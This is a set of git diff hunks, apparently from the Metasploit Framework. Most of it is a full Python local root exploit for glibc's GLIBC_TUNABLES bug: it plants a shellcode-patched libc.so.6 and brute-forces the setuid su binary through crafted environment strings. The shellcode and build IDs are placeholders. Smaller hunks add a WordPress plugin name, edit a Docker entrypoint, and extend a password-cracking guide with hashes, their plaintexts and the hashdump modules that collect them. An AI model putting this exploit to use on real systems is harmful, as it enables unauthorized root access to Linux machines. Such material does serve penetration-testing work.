-----END RSA PRIVATE KEY-----
|
||||
@@ -0,0 +1,312 @@
|
||||
import binascii
|
||||
import os
|
||||
import resource
|
||||
import time
|
||||
import struct
|
||||
import sys
|
||||
|
||||
from ctypes import *
|
||||
from ctypes.util import find_library
|
||||
from shutil import which
|
||||
|
||||
TUNABLES_MISCONFIG = b"GLIBC_TUNABLES=glibc.mem.tagging=glibc.mem.tagging="
|
||||
STRING_TABLE_INDEX = "shstrndx"
|
||||
NUMBER_OF_ENTRIES = "shnum"
|
||||
ENTRY_SIZE = "shentsize"
|
||||
ENTRY_KEYS = "name type flags addr offset size link info addralign entsize"
|
||||
HEADER_ENTRY_FORMAT_64_BIT = "<LLQQQQLLQQ"
|
||||
HEADER_ENTRY_FORMAT_32_BIT = "<LLLLLLLLLL"
|
||||
GNU_BUILD_ID = ".note.gnu.build-id"
|
||||
LIBC_START_MAIN = "__libc_start_main"
|
||||
DYNAMIC_SYMBOL = ".dynsym"
|
||||
DYNAMIC_STRING = ".dynstr"
|
||||
SYMBOL_STRUCTURE_KEYS_64_BIT = "name info other shndx value size"
|
||||
SYMBOL_STRUCTURE_FORMAT_64_BIT = "<LBBHQQ"
|
||||
SYMBOL_STRUCTURE_KEYS_32_BIT = "name value size info other shndx"
|
||||
SYMBOL_STRUCTURE_FORMAT_32_BIT = "<LLLBBH"
|
||||
ELF_HEADER_KEYS = f"type machine version entry phoff shoff flags ehsize phtentsize phnum {ENTRY_SIZE} {NUMBER_OF_ENTRIES} {STRING_TABLE_INDEX}"
|
||||
ELF_ENTRY_FORMAT_64_BIT = "<HHLQQQLHHHHHH"
|
||||
ELF_ENTRY_FORMAT_32_BIT = "<HHLLLLLHHHHHH"
|
||||
|
||||
unhex = lambda v: binascii.unhexlify(v.replace(" ", ""))
|
||||
|
||||
TARGETS = {
|
||||
"i686": {
|
||||
"shellcode": unhex(
|
||||
"METASPLOIT_SHELL_CODE"
|
||||
),
|
||||
"exitcode": unhex("6a665b6a0158cd80"),
|
||||
"stack_top": 0xC0000000,
|
||||
"stack_aslr_bits": 23,
|
||||
},
|
||||
"x86_64": {
|
||||
"shellcode": unhex(
|
||||
"METASPLOIT_SHELL_CODE"
|
||||
),
|
||||
"exitcode": unhex("6a665f6a3c580f05"),
|
||||
"stack_top": 0x800000000000,
|
||||
"stack_aslr_bits": 34,
|
||||
},
|
||||
"aarch64": {
|
||||
"shellcode": unhex(
|
||||
"METASPLOIT_SHELL_CODE"
|
||||
),
|
||||
"exitcode": unhex("c00c80d2a80b80d2010000d4"),
|
||||
"stack_top": 0x1000000000000,
|
||||
"stack_aslr_bits": 30,
|
||||
},
|
||||
}
|
||||
|
||||
# Magic offsets for build IDs can be found for versions of glibc by disabling ASLR and using the original PoC: https://haxx.in/files/gnu-acme.py
|
||||
BUILD_IDS = METASPLOIT_BUILD_IDS
|
||||
|
||||
libc = cdll.LoadLibrary("libc.so.6")
|
||||
libc.execve.argtypes = c_char_p, POINTER(c_char_p), POINTER(c_char_p)
|
||||
resource.setrlimit(
|
||||
resource.RLIMIT_STACK, (resource.RLIM_INFINITY, resource.RLIM_INFINITY)
|
||||
)
|
||||
|
||||
|
||||
def find_path_before_null_character(blob_data, start_offset):
|
||||
current_position = start_offset
|
||||
while current_position > 0:
|
||||
current_byte = blob_data[current_position]
|
||||
next_byte = blob_data[current_position + 1] if current_position + 1 < len(blob_data) else None
|
||||
|
||||
if current_byte != 0 and current_byte != 0x2F and next_byte == 0:
|
||||
path_byte = bytes([current_byte])
|
||||
offset_from_start = current_position - start_offset
|
||||
return {"path": path_byte, "offset": offset_from_start}
|
||||
|
||||
current_position -= 1
|
||||
return None
|
||||
|
||||
|
||||
def parse_structured_data(structure_format, structure_keys, structure_data):
|
||||
unpacked_data = struct.unpack(structure_format, structure_data)
|
||||
parsed_structure = dict(zip(structure_keys.split(" "), unpacked_data))
|
||||
return parsed_structure
|
||||
|
||||
|
||||
def fetch_c_library_path():
|
||||
class LoadedLibrary(Structure):
|
||||
_fields_ = [("l_addr", c_void_p), ("l_name", c_char_p)]
|
||||
|
||||
libc_library = CDLL(find_library("c"))
|
||||
dl_library = CDLL(find_library("dl"))
|
||||
|
||||
dl_info_function = dl_library.dlinfo
|
||||
dl_info_function.argtypes = c_void_p, c_int, c_void_p
|
||||
dl_info_function.restype = c_int
|
||||
|
||||
link_map_ptr = c_void_p()
|
||||
dl_info_function(libc_library._handle, 2, byref(link_map_ptr))
|
||||
|
||||
return cast(link_map_ptr, POINTER(LoadedLibrary)).contents.l_name
|
||||
|
||||
|
||||
def execute_process(executable_path, arguments_list, environment_variables):
|
||||
libc.execve(executable_path, arguments_list, environment_variables)
|
||||
|
||||
|
||||
def execute_and_monitor(executable, arguments, environment):
|
||||
argument_pointers = (c_char_p * len(arguments))(*arguments)
|
||||
environment_pointers = (c_char_p * len(environment))(*environment)
|
||||
|
||||
child_pid = os.fork()
|
||||
if not child_pid:
|
||||
execute_process(executable, argument_pointers, environment_pointers)
|
||||
exit(0)
|
||||
|
||||
start_time = time.time()
|
||||
while True:
|
||||
try:
|
||||
pid, status = os.waitpid(child_pid, os.WNOHANG)
|
||||
if pid == child_pid:
|
||||
if os.WIFEXITED(status):
|
||||
return os.WEXITSTATUS(status) & 0xFF7F
|
||||
else:
|
||||
return 0
|
||||
except:
|
||||
pass
|
||||
current_time = time.time()
|
||||
if current_time - start_time >= 1.5:
|
||||
os.waitpid(child_pid, 0)
|
||||
return "Success"
|
||||
|
||||
|
||||
class DelayedElfParser:
|
||||
def __init__(self, filename):
|
||||
self.data = open(filename, "rb").read()
|
||||
self.architecture = 64 if self.data[4] == 2 else 32
|
||||
|
||||
elf_header_size = 0x30 if self.architecture == 64 else 0x24
|
||||
|
||||
self.header = parse_structured_data(
|
||||
ELF_ENTRY_FORMAT_64_BIT if self.architecture == 64 else ELF_ENTRY_FORMAT_32_BIT,
|
||||
ELF_HEADER_KEYS,
|
||||
self.data[0x10: 0x10 + elf_header_size],
|
||||
)
|
||||
section_header_table_index = self.extract_section_header(self.header[STRING_TABLE_INDEX])
|
||||
self.section_header_names = self.data[section_header_table_index["offset"] : section_header_table_index["offset"] + section_header_table_index["size"]]
|
||||
|
||||
def extract_section_header(self, index):
|
||||
header_offset = self.header["shoff"] + (index * self.header[ENTRY_SIZE])
|
||||
entry_format = HEADER_ENTRY_FORMAT_64_BIT if self.architecture == 64 else HEADER_ENTRY_FORMAT_32_BIT
|
||||
|
||||
return parse_structured_data(entry_format, ENTRY_KEYS, self.data[header_offset : header_offset + self.header[ENTRY_SIZE]])
|
||||
|
||||
def extract_section_header_by_name(self, section_name):
|
||||
encoded_name = section_name.encode()
|
||||
for section_index in range(self.header[NUMBER_OF_ENTRIES]):
|
||||
section_header = self.extract_section_header(section_index)
|
||||
section_name_data = self.section_header_names[section_header["name"]:].split(b"\x00")[0]
|
||||
if section_name_data == encoded_name:
|
||||
return section_header
|
||||
return None
|
||||
|
||||
def extract_section_by_name(self, section_name):
|
||||
section_header = self.extract_section_header_by_name(section_name)
|
||||
if section_header:
|
||||
start_offset = section_header["offset"]
|
||||
end_offset = start_offset + section_header["size"]
|
||||
return self.data[start_offset:end_offset]
|
||||
return None
|
||||
|
||||
def extract_symbol_value(self, symbol_name):
|
||||
encoded_name = symbol_name.encode()
|
||||
dynamic_symbol = self.extract_section_by_name(DYNAMIC_SYMBOL)
|
||||
dynamic_string = self.extract_section_by_name(DYNAMIC_STRING)
|
||||
symbol_entry_size = 24 if self.architecture == 64 else 16
|
||||
|
||||
for entry_index in range(len(dynamic_symbol) // symbol_entry_size):
|
||||
entry_start = entry_index * symbol_entry_size
|
||||
|
||||
if self.architecture == 64:
|
||||
symbol_entry = parse_structured_data(
|
||||
SYMBOL_STRUCTURE_FORMAT_64_BIT,
|
||||
SYMBOL_STRUCTURE_KEYS_64_BIT,
|
||||
dynamic_symbol[entry_start: entry_start + symbol_entry_size],
|
||||
)
|
||||
else:
|
||||
symbol_entry = parse_structured_data(
|
||||
SYMBOL_STRUCTURE_FORMAT_32_BIT,
|
||||
SYMBOL_STRUCTURE_KEYS_32_BIT,
|
||||
dynamic_symbol[entry_start: entry_start + symbol_entry_size],
|
||||
)
|
||||
|
||||
entry_name = dynamic_string[symbol_entry["name"]:].split(b"\x00")[0]
|
||||
if entry_name == encoded_name:
|
||||
return symbol_entry["value"]
|
||||
|
||||
return None
|
||||
|
||||
|
||||
def create_environment(adjustment, address, offset, bits=64):
|
||||
if bits == 64:
|
||||
environment = [
|
||||
TUNABLES_MISCONFIG + b"P" * adjustment,
|
||||
TUNABLES_MISCONFIG + b"X" * 8,
|
||||
TUNABLES_MISCONFIG + b"X" * 7,
|
||||
b"GLIBC_TUNABLES=glibc.mem.tagging=" + b"Y" * 24,
|
||||
]
|
||||
|
||||
padding = 172
|
||||
fill = 47
|
||||
else:
|
||||
environment = [
|
||||
TUNABLES_MISCONFIG + b"P" * adjustment,
|
||||
TUNABLES_MISCONFIG + b"X" * 7,
|
||||
b"GLIBC_TUNABLES=glibc.mem.tagging=" + b"X" * 14,
|
||||
]
|
||||
|
||||
padding = 87
|
||||
fill = 47 * 2
|
||||
|
||||
for j in range(padding):
|
||||
environment.append(b"")
|
||||
|
||||
if bits == 64:
|
||||
environment.append(struct.pack("<Q", address))
|
||||
environment.append(b"")
|
||||
else:
|
||||
environment.append(struct.pack("<L", address))
|
||||
|
||||
for _ in range(384):
|
||||
environment.append(b"")
|
||||
|
||||
for _ in range(fill):
|
||||
if bits == 64:
|
||||
environment.append(
|
||||
struct.pack("<Q", offset & 0xFFFFFFFFFFFFFFFF) * 16382 + b"\xaa" * 7
|
||||
)
|
||||
else:
|
||||
environment.append(
|
||||
struct.pack("<L", offset & 0xFFFFFFFF) * 16382 + b"\xaa" * 7
|
||||
)
|
||||
|
||||
environment.append(None)
|
||||
return environment
|
||||
|
||||
|
||||
def error_and_exit(error_msg):
|
||||
print("Error: %s" % error_msg)
|
||||
exit(-1)
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
|
||||
architecture = os.uname().machine
|
||||
|
||||
if architecture not in TARGETS.keys():
|
||||
error_and_exit("This target's architecture '%s' is not supported by this exploit" % architecture)
|
||||
|
||||
c_library_path = fetch_c_library_path()
|
||||
su_binary_path = which("su")
|
||||
|
||||
memory_alignment = ((0x100 - (len(su_binary_path) + 1 + 8)) & 7) + 8
|
||||
su_binary_elf = DelayedElfParser(su_binary_path)
|
||||
dynamic_linker_path = su_binary_elf.extract_section_by_name(".interp").strip(b"\x00").decode('utf-8')
|
||||
dynamic_linker_elf = DelayedElfParser(dynamic_linker_path)
|
||||
dynamic_linker_build_id = binascii.hexlify(
|
||||
dynamic_linker_elf.extract_section_by_name(GNU_BUILD_ID)[-20:]).decode()
|
||||
|
||||
if dynamic_linker_build_id not in BUILD_IDS.keys():
|
||||
error_and_exit("The build ID found is not exploitable")
|
||||
|
||||
libc_elf = DelayedElfParser(c_library_path)
|
||||
libc_start_main = libc_elf.extract_symbol_value(LIBC_START_MAIN)
|
||||
|
||||
if libc_start_main == None:
|
||||
error_and_exit("The symbol in the libc ELF '__libc_start_main' could not be resolved.")
|
||||
|
||||
su_binary_offset = su_binary_elf.extract_section_header_by_name(".dynstr")["offset"]
|
||||
potential_path = find_path_before_null_character(su_binary_elf.data, su_binary_offset)
|
||||
|
||||
if potential_path is None:
|
||||
error_and_exit("The potential path in the su_binary could not be found.")
|
||||
|
||||
if not os.path.exists(potential_path["path"]):
|
||||
os.mkdir(potential_path["path"])
|
||||
|
||||
with open(potential_path["path"] + b"/libc.so.6", "wb") as file_handle:
|
||||
file_handle.write(libc_elf.data[0:libc_start_main])
|
||||
file_handle.write(TARGETS[architecture]["shellcode"])
|
||||
file_handle.write(libc_elf.data[libc_start_main + len(TARGETS[architecture]["shellcode"]):])
|
||||
|
||||
stack_address = TARGETS[architecture]["stack_top"] - (1 << (TARGETS[architecture]["stack_aslr_bits"]))
|
||||
|
||||
stack_address += memory_alignment
|
||||
|
||||
for i in range(6 if su_binary_elf.architecture == 64 else 4):
|
||||
if (stack_address >> (i * 8)) & 0xFF == 0:
|
||||
stack_address |= 0x10 << (i * 8)
|
||||
|
||||
environment = create_environment(BUILD_IDS[dynamic_linker_build_id], stack_address, potential_path["offset"],
|
||||
su_binary_elf.architecture)
|
||||
count = 1
|
||||
argv = [b"su", b"--help", None]
|
||||
while True:
|
||||
if execute_and_monitor(su_binary_path.encode(), argv, environment) == "Success":
|
||||
exit(0)
|
||||
count += 1
|
||||
@@ -59,3 +59,4 @@ bookingpress
|
||||
paid-memberships-pro
|
||||
woocommerce-payments
|
||||
file-manager-advanced-shortcode
|
||||
royal-elementor-addons
|
||||
|
||||
+10974
-1958
File diff suppressed because it is too large
Load Diff
@@ -12,14 +12,14 @@ if [ "$MSF_UID" -eq "0" ]; then
|
||||
else
|
||||
# if the users group already exists, create a random GID, otherwise
|
||||
# reuse it
|
||||
if ! grep ":$MSF_GID:" /etc/group > /dev/null; then
|
||||
if ! getent group $MSF_GID > /dev/null; then
|
||||
addgroup -g $MSF_GID $MSF_GROUP
|
||||
else
|
||||
addgroup $MSF_GROUP
|
||||
fi
|
||||
|
||||
# check if user id already exists
|
||||
if ! grep ":$MSF_UID:" /etc/passwd > /dev/null; then
|
||||
if ! getent passwd $MSF_UID > /dev/null; then
|
||||
adduser -u $MSF_UID -D $MSF_USER -g $MSF_USER -G $MSF_GROUP $MSF_USER
|
||||
# add user to metasploit group so it can read the source
|
||||
addgroup $MSF_USER $METASPLOIT_GROUP
|
||||
|
||||
@@ -84,6 +84,16 @@ This section will cover the differences between the two crackers. This is not a
|
||||
| md5 (raw, unicode) | Raw-MD5u | 30 (with an empty salt) |
|
||||
| NetNTLMv1 | netntlm | 5500 |
|
||||
| NetNTLMv2 | netntlmv2 | 5600 |
|
||||
| pbkdf2-sha256 | PBKDF2-HMAC-SHA256 | 10900 |
|
||||
| Android (Samsung) SHA1 | | 5800 |
|
||||
| Android (non-Samsung) SHA1 | | 110 |
|
||||
| Android MD5 | | 10 |
|
||||
| xsha | xsha | 122 |
|
||||
| xsha512 | xsha512 | 1722 |
|
||||
| PBKDF2-HMAC-SHA512 | PBKDF2-HMAC-SHA512 | 7100 |
|
||||
| PBKDF2-HMAC-SHA1 | PBKDF2-HMAC-SHA1 | 12001 |
|
||||
| PHPass | phpass | 400 |
|
||||
| mediawiki | mediawiki | 3711 |
|
||||
|
||||
While Metasploit standardizes with the JtR format, the hashcat [library](https://github.com/rapid7/metasploit-framework/blob/master/lib/metasploit/framework/password_crackers/cracker.rb) includes the `jtr_format_to_hashcat_format` function to translate from jtr to hashcat.
|
||||
|
||||
@@ -135,6 +145,8 @@ creds add user:lm_password ntlm:E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB11
|
||||
creds add user:nt_password ntlm:AAD3B435B51404EEAAD3B435B51404EE:8846F7EAEE8FB117AD06BDD830B7586C jtr:nt
|
||||
creds add user:u4-netntlm hash:u4-netntlm::kNS:338d08f8e26de93300000000000000000000000000000000:9526fb8c23a90751cdd619b6cea564742e1e4bf33006ba41:cb8086049ec4736c jtr:netntlm
|
||||
creds add user:admin hash:admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030 jtr:netntlmv2
|
||||
creds add user:mscash-test1 hash:M$test1#64cd29e36a8431a2b111378564a10631 jtr:mscash
|
||||
creds add user:mscash2-hashcat hash:$DCC2$10240#tom#e4e938d12fe5974dc42a90120bd9c90f jtr:mscash2
|
||||
# sql
|
||||
creds add user:mssql05_toto hash:0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908 jtr:mssql05
|
||||
creds add user:mssql_foo hash:0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254 jtr:mssql
|
||||
@@ -151,45 +163,71 @@ creds add user:oracle11_epsilon hash:'S:8F2D65FB5547B71C8DA3760F10960428CD307B1C
|
||||
creds add user:oracle12c_epsilon hash:'H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B30BA62E0E83B6CA2FC7C55177C3A7F82602E3BDD17CEB9B9091CF9DAD672B8BE961A9EAC4D344BDBA878EDC5DCB5899F689EBD8DD1BE3F67BFF9813A464382381AB36B' jtr:pbkdf2,oracle12c
|
||||
## postgres uses username, so we can't override that here
|
||||
creds add user:example postgres:md5be86a79bf2043622d58d5453c47d4860
|
||||
## other
|
||||
# mobile
|
||||
creds add user:samsungsha1 hash:D1B19A90B87FC10C304E657F37162445DAE27D16:a006983800cc3dd1 jtr:android-samsung-sha1
|
||||
creds add user:androidsha1 hash:9860A48CA459D054F3FEF0F8518CF6872923DAE2:81fcb23bcadd6c5 jtr:android-sha1
|
||||
creds add user:androidmd5 hash:1C0A0FDB673FBA36BEAEB078322C7393:81fcb23bcadd6c5 jtr:android-md5
|
||||
# OSX
|
||||
creds add user:xsha_hashcat hash:1430823483d07626ef8be3fda2ff056d0dfd818dbfe47683 jtr:xsha
|
||||
creds add user:pbkdf2_hashcat hash:$ml$35460$93a94bd24b5de64d79a5e49fa372827e739f4d7b6975c752c9a0ff1e5cf72e05$752351df64dd2ce9dc9c64a72ad91de6581a15c19176266b44d98919dfa81f0f96cbcb20a1ffb400718c20382030f637892f776627d34e021bad4f81b7de8222 jtr:PBKDF2-HMAC-SHA512
|
||||
creds add user:xsha512_hashcat hash:648742485c9b0acd786a233b2330197223118111b481abfa0ab8b3e8ede5f014fc7c523991c007db6882680b09962d16fd9c45568260531bdb34804a5e31c22b4cfeb32d jtr:xsha512
|
||||
# webapps
|
||||
creds add user:mediawiki_hashcat hash:$B$56668501$0ce106caa70af57fd525aeaf80ef2898 jtr:mediawiki
|
||||
creds add user:phpass_p_hashcat hash:$P$984478476IagS59wHZvyQMArzfx58u. jtr:phpass
|
||||
creds add user:phpass_h_hashcat hash:$H$984478476IagS59wHZvyQMArzfx58u. jtr:phpass
|
||||
creds add user:atlassian_hashcat hash:{PKCS5S2}NzIyNzM0NzY3NTIwNjI3MdDDis7wPxSbSzfFqDGf7u/L00kSEnupbz36XCL0m7wa jtr:PBKDF2-HMAC-SHA1
|
||||
# other
|
||||
creds add user:hmac_password hash:'<3263520797@127.0.0.1>#3f089332842764e71f8400ede97a84c9' jtr:hmac-md5
|
||||
creds add user:vmware_ldap hash:'$dynamic_82$a702505b8a67b45065a6a7ff81ec6685f08d06568e478e1a7695484a934b19a28b94f58595d4de68b27771362bc2b52444a0ed03e980e11ad5e5ffa6daa9e7e1$HEX$171ada255464a439569352c60258e7c6' jtr:dynamic_82
|
||||
creds add user:admin hash:'$pbkdf2-sha256$260000$Q1hzYjU5dFNMWm05QUJCTg$s.vmjGlIV0ZKV1Sp3dTdrcn/i9CTqxPZ0klve4HreeU' jtr:pbkdf2-sha256
|
||||
```
|
||||
|
||||
This data breaks down to the following table:
|
||||
|
||||
| Hash Type | Username | Hash | Password | jtr format | Modules which dump this info | Modules which crack this |
|
||||
| ------------------------------------ | ------------------ | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------ | ---------------- | ------------------------------------------------ | --------------------------------------------------------- |
|
||||
| ----------- | ---------- | ------ | ---------- | ------------ | ------------------------------ | ------------------------- |
|
||||
| DES | des_password | `rEK1ecacw.7.c` | password | des | | auxiliary/analyze/crack_aix auxiliary/analyze/crack_linux |
|
||||
| MD5 | md5_password | `$1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/` | password | md5 | | auxiliary/analyze/crack_linux |
|
||||
| BSDi | bsdi_password | `_J9..K0AyUubDrfOgO4s` | password | bsdi | | auxiliary/analyze/crack_linux |
|
||||
| SHA256 | sha256_password | `$5$MnfsQ4iN$ZMTppKN16y/tIsUYs/obHlhdP.Os80yXhTurpBMUbA5` | password | sha256,crypt | | auxiliary/analyze/crack_linux |
|
||||
| SHA512 | sha512_password | `$6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1` | password | sha512,crypt | | auxiliary/analyze/crack_linux |
|
||||
| Blowfish | blowfish_password | `$2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe` | password | bf | | auxiliary/analyze/crack_linux |
|
||||
| Lanman | lm_password | `E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C` | password | lm | | auxiliary/analyze/crack_windows |
|
||||
| NTLM | nt_password | `AAD3B435B51404EEAAD3B435B51404EE:8846F7EAEE8FB117AD06BDD830B7586C` | password | nt | | auxiliary/analyze/crack_windows |
|
||||
| NetNTLMv1 | u4-netntlm | `u4-netntlm::kNS:338d08f8e26de93300000000000000000000000000000000:9526fb8c23a90751cdd619b6cea564742e1e4bf33006ba41:cb8086049ec4736c` | hashcat | netntlm | | auxiliary/analyze/crack_windows |
|
||||
| NetNTLMv2 | admin | `admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030` | hashcat | netntlmv2 | | auxiliary/analyze/crack_windows |
|
||||
| MSSQL (2005) | mssql05_toto | `0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908` | toto | mssql05 | auxiliary/scanner/mssql/mssql_hashdump | auxiliary/analyze/crack_databases |
|
||||
| MSSQL | mssql_foo | `0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254` | foo | mssql | auxiliary/scanner/mssql/mssql_hashdump | auxiliary/analyze/crack_databases |
|
||||
| MSSQL (2012) | mssql12_Password1! | `0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16` | Password! | mssql12 | auxiliary/scanner/mssql/mssql_hashdump | auxiliary/analyze/crack_databases |
|
||||
| MySQL | mysql_probe | `445ff82636a7ba59` | probe | mysql | auxiliary/scanner/mysql/mysql_hashdump | auxiliary/analyze/crack_databases |
|
||||
| MySQL SHA1 | mysql-sha1_tere | `*5AD8F88516BD021DD43F171E2C785C69F8E54ADB` | tere | mysql-sha1 | auxiliary/scanner/mysql/mysql_hashdump | auxiliary/analyze/crack_databases |
|
||||
| Oracle | simon | `4F8BC1809CB2AF77` | A | des,oracle | auxiliary/scanner/oracle/oracle_hashdump | auxiliary/analyze/crack_databases |
|
||||
| Oracle | SYSTEM | `9EEDFA0AD26C6D52` | THALES | des,oracle | auxiliary/scanner/oracle/oracle_hashdump | auxiliary/analyze/crack_databases |
|
||||
| Oracle 11 | DEMO | `S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C` | epsilon | raw-sha1,oracle | auxiliary/scanner/oracle/oracle_hashdump | auxiliary/analyze/crack_databases |
|
||||
| Oracle 11 | oracle11_epsilon | `S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C` | epsilon | raw-sha1,oracle | modules/auxiliary/scanner/oracle/oracle_hashdump | auxiliary/analyze/crack_databases |
|
||||
| Oracle 12 | oracle12_epsilon | `H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B30BA62E0E83B6CA2FC7C55177C3A7F82602E3BDD17CEB9B9091CF9DAD672B8BE961A9EAC4D344BDBA878EDC5DCB5899F689EBD8DD1BE3F67BFF9813A464382381AB36B` | epsilon | pbkdf2,oracle12c | auxiliary/scanner/oracle/oracle_hashdump | auxiliary/analyze/crack_databases |
|
||||
| Postgres | example | `md5be86a79bf2043622d58d5453c47d4860` | password | raw-md5,postgres | auxiliary/scanner/postgres/postgres_hashdump | auxiliary/analyze/crack_databases |
|
||||
| HMAC-MD5 | hmac_password | `<3263520797@127.0.0.1>#3f089332842764e71f8400ede97a84c9` | password | hmac-md5 | auxiliary/server/capture/smtp | None |
|
||||
| SHA512($p.$s)/dynamic_82/vmware ldap | vmware_ldap | `$dynamic_82$a702505b8a67b45065a6a7ff81ec6685f08d06568e478e1a7695484a934b19a28b94f58595d4de68b27771362bc2b52444a0ed03e980e11ad5e5ffa6daa9e7e1$HEX$171ada255464a439569352c60258e7c6` | TestPass123# | dynamic_82 | | None | | |
|
||||
| Hash Type | Username | Hash | Password | jtr format | Modules which dump this info | Modules which crack this |
|
||||
| ------------------------------------ | ------------------ | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------ | -------------------- | ------------------------------------------------ | --------------------------------------------------------- |
|
||||
| ----------- | ---------- | ------ | ---------- | ------------ | ------------------------------ | ------------------------- |
|
||||
| DES | des_password | `rEK1ecacw.7.c` | password | des | post/aix/gather/hashdump | auxiliary/analyze/crack_aix auxiliary/analyze/crack_linux |
|
||||
| MD5 | md5_password | `$1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/` | password | md5 | post/linux/gather/hashdump | auxiliary/analyze/crack_linux |
|
||||
| BSDi | bsdi_password | `_J9..K0AyUubDrfOgO4s` | password | bsdi | post/linux/gather/hashdump | auxiliary/analyze/crack_linux |
|
||||
| SHA256 | sha256_password | `$5$MnfsQ4iN$ZMTppKN16y/tIsUYs/obHlhdP.Os80yXhTurpBMUbA5` | password | sha256,crypt | post/linux/gather/hashdump | auxiliary/analyze/crack_linux |
|
||||
| SHA512 | sha512_password | `$6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1` | password | sha512,crypt | post/linux/gather/hashdump | auxiliary/analyze/crack_linux |
|
||||
| Blowfish | blowfish_password | `$2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe` | password | bf | post/linux/gather/hashdump | auxiliary/analyze/crack_linux |
|
||||
| Lanman | lm_password | `E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C` | password | lm | post/windows/gather/hashdump | auxiliary/analyze/crack_windows |
|
||||
| NTLM | nt_password | `AAD3B435B51404EEAAD3B435B51404EE:8846F7EAEE8FB117AD06BDD830B7586C` | password | nt | post/linux/gather/hashdump | auxiliary/analyze/crack_windows |
|
||||
| NetNTLMv1 | u4-netntlm | `u4-netntlm::kNS:338d08f8e26de93300000000000000000000000000000000:9526fb8c23a90751cdd619b6cea564742e1e4bf33006ba41:cb8086049ec4736c` | hashcat | netntlm | | auxiliary/analyze/crack_windows |
|
||||
| NetNTLMv2 | admin | `admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030` | hashcat | netntlmv2 | | auxiliary/analyze/crack_windows |
|
||||
| MSCash | mscash-test1 | `M$test1#64cd29e36a8431a2b111378564a10631` | test1 | mscash | | auxiliary/analyze/crack_windows |
|
||||
| MSCash2 | mscash2-hashcat | `$DCC2$10240#tom#e4e938d12fe5974dc42a90120bd9c90f` | hashcat | mscash2 | | auxiliary/analyze/crack_windows |
|
||||
| MSSQL (2005) | mssql05_toto | `0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908` | toto | mssql05 | auxiliary/scanner/mssql/mssql_hashdump | auxiliary/analyze/crack_databases |
|
||||
| MSSQL | mssql_foo | `0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254` | foo | mssql | auxiliary/scanner/mssql/mssql_hashdump | auxiliary/analyze/crack_databases |
|
||||
| MSSQL (2012) | mssql12_Password1! | `0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16` | Password! | mssql12 | auxiliary/scanner/mssql/mssql_hashdump | auxiliary/analyze/crack_databases |
|
||||
| MySQL | mysql_probe | `445ff82636a7ba59` | probe | mysql | auxiliary/scanner/mysql/mysql_hashdump | auxiliary/analyze/crack_databases |
|
||||
| MySQL SHA1 | mysql-sha1_tere | `*5AD8F88516BD021DD43F171E2C785C69F8E54ADB` | tere | mysql-sha1 | auxiliary/scanner/mysql/mysql_hashdump | auxiliary/analyze/crack_databases |
|
||||
| Oracle | simon | `4F8BC1809CB2AF77` | A | des,oracle | auxiliary/scanner/oracle/oracle_hashdump | auxiliary/analyze/crack_databases |
|
||||
| Oracle | SYSTEM | `9EEDFA0AD26C6D52` | THALES | des,oracle | auxiliary/scanner/oracle/oracle_hashdump | auxiliary/analyze/crack_databases |
|
||||
